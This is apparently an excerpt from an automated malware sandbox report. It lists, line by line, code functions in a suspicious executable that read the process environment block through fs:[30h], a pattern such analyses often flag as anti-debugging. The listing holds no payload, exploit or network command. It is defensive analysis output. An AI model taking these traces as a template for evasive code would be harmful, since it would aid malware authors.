    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E235B6 mov eax, dword ptr fs:[00000030h] 5_2_36E235B6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4758F mov eax, dword ptr fs:[00000030h] 5_2_36D4758F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4758F mov eax, dword ptr fs:[00000030h] 5_2_36D4758F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4758F mov eax, dword ptr fs:[00000030h] 5_2_36D4758F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0F5BE mov eax, dword ptr fs:[00000030h] 5_2_36E0F5BE
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE35BA mov eax, dword ptr fs:[00000030h] 5_2_36DE35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE35BA mov eax, dword ptr fs:[00000030h] 5_2_36DE35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE35BA mov eax, dword ptr fs:[00000030h] 5_2_36DE35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE35BA mov eax, dword ptr fs:[00000030h] 5_2_36DE35BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7F5B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7F5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DED5B0 mov eax, dword ptr fs:[00000030h] 5_2_36DED5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DED5B0 mov eax, dword ptr fs:[00000030h] 5_2_36DED5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h] 5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h] 5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h] 5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h] 5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715A9 mov eax, dword ptr fs:[00000030h] 5_2_36D715A9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFB550 mov eax, dword ptr fs:[00000030h] 5_2_36DFB550
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFB550 mov eax, dword ptr fs:[00000030h] 5_2_36DFB550
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFB550 mov eax, dword ptr fs:[00000030h] 5_2_36DFB550
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8B570 mov eax, dword ptr fs:[00000030h] 5_2_36D8B570
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8B570 mov eax, dword ptr fs:[00000030h] 5_2_36D8B570
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B562 mov eax, dword ptr fs:[00000030h] 5_2_36D4B562
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0B52F mov eax, dword ptr fs:[00000030h] 5_2_36E0B52F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E25537 mov eax, dword ptr fs:[00000030h] 5_2_36E25537
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D87505 mov eax, dword ptr fs:[00000030h] 5_2_36D87505
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D87505 mov ecx, dword ptr fs:[00000030h] 5_2_36D87505
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h] 5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h] 5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D534 mov eax, dword ptr fs:[00000030h]5_2_36D5D534
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8D530 mov eax, dword ptr fs:[00000030h]5_2_36D8D530
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8D530 mov eax, dword ptr fs:[00000030h]5_2_36D8D530
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFF525 mov eax, dword ptr fs:[00000030h]5_2_36DFF525
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E252E2 mov eax, dword ptr fs:[00000030h]5_2_36E252E2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F2D0 mov eax, dword ptr fs:[00000030h]5_2_36D7F2D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F2D0 mov eax, dword ptr fs:[00000030h]5_2_36D7F2D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B2D3 mov eax, dword ptr fs:[00000030h]5_2_36D4B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B2D3 mov eax, dword ptr fs:[00000030h]5_2_36D4B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B2D3 mov eax, dword ptr fs:[00000030h]5_2_36D4B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED mov eax, dword ptr fs:[00000030h]5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D592C5 mov eax, dword ptr fs:[00000030h]5_2_36D592C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D592C5 mov eax, dword ptr fs:[00000030h]5_2_36D592C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C0 mov eax, dword ptr fs:[00000030h]5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F2F8 mov eax, dword ptr fs:[00000030h]5_2_36E0F2F8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D492FF mov eax, dword ptr fs:[00000030h]5_2_36D492FF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB2F0 mov eax, dword ptr fs:[00000030h]5_2_36DFB2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB2F0 mov eax, dword ptr fs:[00000030h]5_2_36DFB2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8329E mov eax, dword ptr fs:[00000030h]5_2_36D8329E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8329E mov eax, dword ptr fs:[00000030h]5_2_36D8329E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E192A6 mov eax, dword ptr fs:[00000030h]5_2_36E192A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E192A6 mov eax, dword ptr fs:[00000030h]5_2_36E192A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E192A6 mov eax, dword ptr fs:[00000030h]5_2_36E192A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E192A6 mov eax, dword ptr fs:[00000030h]5_2_36E192A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25283 mov eax, dword ptr fs:[00000030h]5_2_36E25283
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD92BC mov eax, dword ptr fs:[00000030h]5_2_36DD92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD92BC mov eax, dword ptr fs:[00000030h]5_2_36DD92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD92BC mov ecx, dword ptr fs:[00000030h]5_2_36DD92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD92BC mov ecx, dword ptr fs:[00000030h]5_2_36DD92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A0 mov eax, dword ptr fs:[00000030h]5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A0 mov eax, dword ptr fs:[00000030h]5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A0 mov eax, dword ptr fs:[00000030h]5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A0 mov eax, dword ptr fs:[00000030h]5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE72A0 mov eax, dword ptr fs:[00000030h]5_2_36DE72A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE72A0 mov eax, dword ptr fs:[00000030h]5_2_36DE72A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1D26B mov eax, dword ptr fs:[00000030h]5_2_36E1D26B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1D26B mov eax, dword ptr fs:[00000030h]5_2_36E1D26B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49240 mov eax, dword ptr fs:[00000030h]5_2_36D49240
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49240 mov eax, dword ptr fs:[00000030h]5_2_36D49240
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8724D mov eax, dword ptr fs:[00000030h]5_2_36D8724D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D79274 mov eax, dword ptr fs:[00000030h]5_2_36D79274
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D91270 mov eax, dword ptr fs:[00000030h]5_2_36D91270
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D91270 mov eax, dword ptr fs:[00000030h]5_2_36D91270
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0B256 mov eax, dword ptr fs:[00000030h]5_2_36E0B256
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0B256 mov eax, dword ptr fs:[00000030h]5_2_36E0B256
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25227 mov eax, dword ptr fs:[00000030h]5_2_36E25227
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D87208 mov eax, dword ptr fs:[00000030h]5_2_36D87208
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D87208 mov eax, dword ptr fs:[00000030h]5_2_36D87208
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F3E6 mov eax, dword ptr fs:[00000030h]5_2_36E0F3E6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E253FC mov eax, dword ptr fs:[00000030h]5_2_36E253FC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0B3D0 mov ecx, dword ptr fs:[00000030h]5_2_36E0B3D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA739A mov eax, dword ptr fs:[00000030h]5_2_36DA739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA739A mov eax, dword ptr fs:[00000030h]5_2_36DA739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF13B9 mov eax, dword ptr fs:[00000030h]5_2_36DF13B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF13B9 mov eax, dword ptr fs:[00000030h]5_2_36DF13B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF13B9 mov eax, dword ptr fs:[00000030h]5_2_36DF13B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D733A5 mov eax, dword ptr fs:[00000030h]5_2_36D733A5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D833A0 mov eax, dword ptr fs:[00000030h]5_2_36D833A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D833A0 mov eax, dword ptr fs:[00000030h]5_2_36D833A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2539D mov eax, dword ptr fs:[00000030h]5_2_36E2539D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49353 mov eax, dword ptr fs:[00000030h]5_2_36D49353
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49353 mov eax, dword ptr fs:[00000030h]5_2_36D49353
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F367 mov eax, dword ptr fs:[00000030h]5_2_36E0F367
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D34C mov eax, dword ptr fs:[00000030h]5_2_36D4D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D34C mov eax, dword ptr fs:[00000030h]5_2_36D4D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25341 mov eax, dword ptr fs:[00000030h]5_2_36E25341
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57370 mov eax, dword ptr fs:[00000030h]5_2_36D57370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57370 mov eax, dword ptr fs:[00000030h]5_2_36D57370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57370 mov eax, dword ptr fs:[00000030h]5_2_36D57370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF3370 mov eax, dword ptr fs:[00000030h]5_2_36DF3370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1132D mov eax, dword ptr fs:[00000030h]5_2_36E1132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1132D mov eax, dword ptr fs:[00000030h]5_2_36E1132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD930B mov eax, dword ptr fs:[00000030h]5_2_36DD930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD930B mov eax, dword ptr fs:[00000030h]5_2_36DD930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD930B mov eax, dword ptr fs:[00000030h]5_2_36DD930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D47330 mov eax, dword ptr fs:[00000030h]5_2_36D47330
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7F32A mov eax, dword ptr fs:[00000030h]5_2_36D7F32A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D790DB mov eax, dword ptr fs:[00000030h]5_2_36D790DB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov ecx, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov ecx, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov ecx, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov ecx, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C0 mov eax, dword ptr fs:[00000030h]5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD0C0 mov eax, dword ptr fs:[00000030h]5_2_36DCD0C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD0C0 mov eax, dword ptr fs:[00000030h]5_2_36DCD0C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D750E4 mov eax, dword ptr fs:[00000030h]5_2_36D750E4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D750E4 mov ecx, dword ptr fs:[00000030h]5_2_36D750E4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E250D9 mov eax, dword ptr fs:[00000030h]5_2_36E250D9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D55096 mov eax, dword ptr fs:[00000030h]5_2_36D55096
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8909C mov eax, dword ptr fs:[00000030h]5_2_36D8909C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7D090 mov eax, dword ptr fs:[00000030h]5_2_36D7D090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7D090 mov eax, dword ptr fs:[00000030h]5_2_36D7D090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D08D mov eax, dword ptr fs:[00000030h]5_2_36D4D08D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDD080 mov eax, dword ptr fs:[00000030h]5_2_36DDD080
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDD080 mov eax, dword ptr fs:[00000030h]5_2_36DDD080
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF705E mov ebx, dword ptr fs:[00000030h]5_2_36DF705E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF705E mov eax, dword ptr fs:[00000030h]5_2_36DF705E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25060 mov eax, dword ptr fs:[00000030h]5_2_36E25060
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B052 mov eax, dword ptr fs:[00000030h]5_2_36D7B052
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov ecx, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD070 mov ecx, dword ptr fs:[00000030h]5_2_36DCD070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD106E mov eax, dword ptr fs:[00000030h]5_2_36DD106E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1903E mov eax, dword ptr fs:[00000030h]5_2_36E1903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1903E mov eax, dword ptr fs:[00000030h]5_2_36E1903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1903E mov eax, dword ptr fs:[00000030h]5_2_36E1903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1903E mov eax, dword ptr fs:[00000030h]5_2_36E1903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E231E1 mov eax, dword ptr fs:[00000030h]5_2_36E231E1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8D1D0 mov eax, dword ptr fs:[00000030h]5_2_36D8D1D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8D1D0 mov ecx, dword ptr fs:[00000030h]5_2_36D8D1D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF71F9 mov esi, dword ptr fs:[00000030h]5_2_36DF71F9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E251CB mov eax, dword ptr fs:[00000030h]5_2_36E251CB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D551ED mov eax, dword ptr fs:[00000030h]5_2_36D551ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
